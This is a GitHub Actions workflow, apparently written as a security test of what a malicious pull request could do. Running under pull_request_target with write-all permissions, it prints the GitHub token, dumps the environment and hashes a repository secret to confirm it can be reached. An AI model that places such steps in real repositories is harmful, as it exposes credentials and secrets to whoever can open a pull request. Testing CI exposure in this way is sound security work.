# Testing out what a malicious PR adding a workflow could accomplish
name: Test malicious workflow

on:
  pull_request_target:

permissions: write-all

jobs:
  test-job:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
        with:
          persist-credentials: true
      - run: echo ${{ github.token }}
      - run: env
      - run: md5sum <<<"${{ secrets.CHAPEL_BUILD_MAIL_ADDRESS }}"
